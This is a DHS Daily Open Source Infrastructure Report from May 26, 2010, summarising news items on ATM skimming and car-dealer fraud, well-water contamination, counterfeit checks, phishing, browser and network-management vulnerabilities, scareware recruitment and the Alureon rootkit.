Department of Homeland Security Daily Open Source Infrastructure Report

Wednesday, May 26, 2010

Complete DHS Daily Report for May 26, 2010

Daily Report

Top Stories

 Federal authorities allege that two cells of Bulgarian organized criminals defrauded Las Vegas and Phoenix area car dealers out of $1.6 million and stole at least $700,000 from bank ATMs around the valley, the Las Vegas Review-Journal reports. In all, 11 people were charged in three separate indictments unsealed last week in federal court after a two-year FBI investigation that involved the use of court-approved wiretaps. (See item 16 below in the Banking and Finance Sector)

 According to Before It’s News, about 105 million people — or more than one-third of the nation’s population — receive their drinking water from one of the 140,000 public water systems across the United States that rely on groundwater pumped from public wells. More than 20 percent of untreated water samples from 932 public wells across the nation contained at least one contaminant at levels of potential health concern, states a new study by the U.S. Geological Survey. (See item 37)

37. May 21, Before It’s News – (National) Wellwater contamination a health risk for more than one third of U.S. population say USGS scientists. What’s your poison? That question may be more appropriate when asking for a glass of water than bellying up to the bar with a friend. Maybe you would like a chemical cocktail of contaminants? About 105 million people — or more than one-third of the nation’s population — receive their drinking water from one of the 140,000 public water systems across the United States that rely on groundwater pumped from public wells. More than 20 percent of untreated water samples from 932 public wells across the nation contained at least one contaminant at levels of potential health concern, according to a new study by the U.S. Geological Survey. The USGS focused primarily on source (untreated) water collected from public wells before treatment or blending, rather than the finished (treated) drinking water that water utilities deliver to their customers. Findings showed that naturally occurring contaminants, such as radon and arsenic, accounted for about three-quarters of contaminant concentrations greater than human-health benchmarks in untreated source water. Naturally occurring contaminants are mostly derived from the natural geologic materials that make up the aquifers from which wellwater is withdrawn. Man-made contaminants were also found in untreated water sampled from the public wells, including herbicides, insecticides, solvents, disinfection by-products, nitrate, and gasoline chemicals. Man-made contaminants accounted for about one-quarter of contaminant concentrations greater than human-health benchmarks, but were detected in 64 percent of the samples, predominantly in samples from unconfined aquifers. Source:


Banking and Finance Sector

16. May 25, Las Vegas Review-Journal – (Arizona; Nevada) Las Vegas Investigation: Crime ring busted, FBI says. Federal authorities allege that two cells of Bulgarian organized criminals defrauded Las Vegas and Phoenix area car dealers out of $1.6 million and stole at least $700,000 from bank ATMs around the valley. In all, 11 people were charged in three separate indictments unsealed last week in federal court after a two-year FBI investigation that involved the use of court-approved wiretaps. The FBI declined to comment May 24 as agents continued to search for some of the defendants. At a hearing May 24, the assistant U.S. attorney said the FBI had obtained information from authorities in Bulgaria that one of the alleged ringleaders was an associate of organized crime figures in that country. The suspect, a U.S. citizen who lives in Las Vegas, was charged in all three indictments, including one that accuses him and his wife of unlawfully obtaining a 9 millimeter pistol during the criminal investigation. Another indictment charges the alleged ringleader and five other men with conspiracy, wire fraud and transportation of stolen property in a scheme to unlawfully acquire vehicles from car dealers and ship them coast to coast and to Eastern Europe. The ring would send in straw buyers claiming to be employed by phony companies at lucrative salaries in an effort to obtain financing for the vehicles, the indictment charges. In another indictment, the suspect and four other men are charged with trafficking in counterfeit access devices and aggravated identity theft in a scheme in spring 2009 to steal bank account numbers and PIN numbers from customers. The ring stole the information with the help of a scanning device or a small camera secretly installed at an ATM, where customers withdraw money, the indictment alleges. After obtaining the bank information, ring members allegedly encoded it onto a blank plastic card with a magnetic strip, allowing them to withdraw the cash from the ATMs. In recent years, authorities in the United States have seen a rise in this kind of “skimming” scheme, particularly from organized crime groups out of Eastern Europe. Source:

17. May 25, Associated Press – (Wisconsin) ‘Tinfoil bandits’ arrested in Rock County. Rock County, Wisconsin authorities have arrested three people they say disabled a convenience store’s credit card system and then made multiple purchases. Rock County sheriff’s officials said the group came into Carl’s Shell in Newville nine times Monday evening and made repeated credit card purchases for cigarettes, beer, and soda. A clerk called police. A state trooper later pulled over the group’s car. Two men and a woman, all in their 20s, were arrested. Investigators believe the group climbed on the store’s roof and covered the store’s satellite dishes with tinfoil, preventing the store’s credit card machines from transmitting transaction information, meaning their cards would not be charged. Source:

18. May 25, Winston-Salem Journal Reporter – (National) Fidelity Bank issues warning about fake cashier’s checks. The Fidelity Bank, which has 15 branches in the Triad, said May 24 that it has notified the Federal Deposit Insurance Corp. that counterfeit cashier’s checks bearing its name are in circulation. The counterfeit items display the routing number 053103585, which is assigned to the bank. The items are markedly dissimilar to authentic checks. The words “cashier’s check” are shown inside of a box in the top-center area. A security feature statement appears below the border on both sides of the box. A security feature statement also appears across the bottom of the items. The phrase “authorized signature” is shown below the signature line in the lower-right corner. According to the bank, authentic cashier’s checks are gray. The words “cashier’s check” are in the top-center area with horizontal lines on both sides. A “notice to customers” statement appears inside of a box below the written amount line on the left side of the checks. Source:

19. May 24, Rapid City Journal – (South Dakota) Bank alerts members to phishing scam. Sentinel Federal Credit Union is alerting the Rapid City, South Dakota community of a telephone scam that has targeted the area over the past several days. This scam, called phishing, attempts to steal personal information. In the scam, people are receiving fraudulent automated messages stating their Sentinel Federal Credit Union ATM or debit card has been compromised. The automated message then instructs the caller to enter their card number to reactivate the card. Sentinel Federal Credit Union said it will never contact its members this way. Source:

For another story, see item 49 below in the Information Technology Sector

Information Technology

49. May 25, The New New Internet – (International) Researcher finds new type of phishing attack. A researcher has found a new method for carrying out phishing attacks “that takes advantage of the way that browsers handle tabbed browsing and enables an attacker to use a script running in one tab to completely change the content in another tab,” according to ThreatPost. The attack, discovered by a researcher for Mozilla, relies on users visiting a controlled infected Web site. When the user visits the infected Web site, it reads what other tabs the user has opened in the browser and changes itself to look like a selected page. The researcher actually demonstrates it on his Web site in which the page alters to appear as the log-in page for Google. The system could also be used in the case of banking Web sites, etc. to steal login and account information. Source:

50. May 25, Infoworld – (International) Security forecast: High chance of ‘shadow’ clouds. If people think “cloud networks” and “cloud services” are just buzzwords or another set of technologies destined for extinction, think again: The cloud is here to stay. In the future, companies will subscribe to one or more cloud products — if they have not already. A friend of mine asked if we would prevent unauthorized cloud products, which he called “shadow clouds,” from starting to appear on our networks. His question is not as strange as it might sound. Every new, big technology leap has also brought in a deluge of unmanaged instances — think instant messaging or social network sites. Shadow clouds would, in fact, be a more significant threat to your company’s confidential information than IM or social networking blogs. All computer services and presences need to be managed to ensure compliant security, content, and messaging, but with a shadow cloud, a user is at greater risk because their company’s confidential data is more likely to be hosted on the cloud provider’s systems. Ridiculous or unusual though it may sound, IT security should start preparing now for the emergence of shadow clouds. Source:

51. May 25, SC Magazine – (International) Warnings made of vulnerability in the 3Com Intelligent Management Centre that could result in lack of consumer control. Organizations have been warned that they could lose control of their networks due to a vulnerability in the 3Com Intelligent Management Center (IMC). Penetration testing company ProCheckUp claimed that users of IMC are at risk of losing control of the application, which is designed to manage, monitor and control enterprise networks. It reported that it was able to gain control of IMC without providing any passwords or authentication information. It said that this was completed through directory traversal, SQL admin account password retrieval and cross-site scripting attacks. A security consultant at ProCheckUp claimed that this security hole could allow an attacker to alter switches and routers which are managed by the IMC, and potentially switch off a whole organization’s network and Internet facilities. 3Com has been informed and released a patched version that addresses the issues. Source:

52. May 25, The Register – (International) Looking for code work? Write fake anti-virus scripts. A scareware purveyor has brazenly advertised for recruits on a mainstream job market Webs ite. A job ad on offers work for a coder prepared to turn his hand to the creation of fake anti-virus Web site redirection scripts. However, prospective applicants are warned not to expect a big payday — the budget for the whole project is between $30 and $250. On the plus side the prospective employer, redlinecl, has 100 percent positive feedback from previous coding lackeys. One said: “Nice buyer, hope can work for him again in the future.” Of course when the job involves tricking the unsuspecting into visiting scareware portals in order to flog software of little or no utility it is probably wise to take these glowing reviews with a pinch of salt. The ad, posted May 24, was spotted by a security researcher of Websense, who notes that the same chap was previously involved in fake PayPal pages, spam campaigns and other forms of malfeasance. The market for scareware is booming. Shysters involved in the business are increasingly adopting the business structures of mainstream security firms - even to the point of running call centers designed to persuade people not to try to apply for refunds, and recruitment programs. Source:

53. May 24, DarkReading – (International) Apple Safari ‘carpet bomb’ flaw remains unfixed two years later. Apple fixed the so-called “carpet bomb” vulnerability in its Safari browser for Windows after Microsoft issued a security advisory about it in July 2008, but to date the very same flaw in Safari for OS X is still unpatched. The security researcher who alerted Apple of the flaw in May 2008 said the threat of an attacker exploiting this bug is alive and well today, especially with the growth in popularity of Safari and OS X. He said in 2008 Apple told him it did not consider the issue a security vulnerability but more of a design issue, and that it did not have plans to fix it anytime soon. The researcher said the vulnerability could let a bad guy download malicious binaries and data files into the browser’s downloads folder without the user knowing because Safari does not ask the user whether he wants to save the file on his machine, which most other browsers do. So when a user visits a malicious Web site, Safari would allow the site to download files without prompting the user. The main threat the flaw poses is a denial-of-service attack on the victim’s machine. The carpet bomb DoS attack would wipe out a session and “whatever you were working on would be gone,” the researcher said. Source:

May 24, Infoworld – (International) Four-year-old rootkit tops the charts of PC threats. Microsoft just released its May Threat Report, and the results should give one pause. With nearly 2 million infected systems cleaned, the nefarious Alureon rootkit came out on top. Since it first appeared in 2006, Alureon (known in various incarnations as TDSS, Zlob, or DNSChanger) has morphed into a mean money-making marvel: a varied collection of Trojans most famous for their ability to invisibly take control of a PC’s interactions with the outside world. Alureon frequently runs as a rootkit, snatches information sent and received over the Internet, and may install a backdoor that allows Alureon’s masters to update a computer with the software of their choice. As with most malware, people inadvertently install Alureon when they think they are installing something else. Microsoft’s April Threat Report explains that a typical Alureon installer asks to be elevated to administrator status. Source:

55. May 24, CSO – (International) Business continuity, not data breaches, among top concerns for tech firms. Data security and breach prevention ranks low as a risk factor for most big technical companies, according to new research that identifies the most widespread concerns among the 100 largest U.S. public technology companies. The research, released by BDO, a professional services firm, examines the risk factors listed in the fiscal year 2009 10-K SEC filings of the companies; the factors were analyzed and ranked in order by frequency cited. Among security risks, natural disasters, wars, conflicts and terrorist attacks were cited by 55 percent of respondents as a risk concern and was 16th on the list, much higher than breaches of technology security, privacy and theft, which was mentioned by 44 percent of the companies, putting it at 23rd on the list. The leader of the Technology Practice at BDO said he thought business continuity was driving worries about risks like natural disasters and conflicts. Accounting, internal controls and Sarbanes-Oxley compliance is the 18th largest risk factor this year, according to the list. Source:

Communications Sector

Nothing to report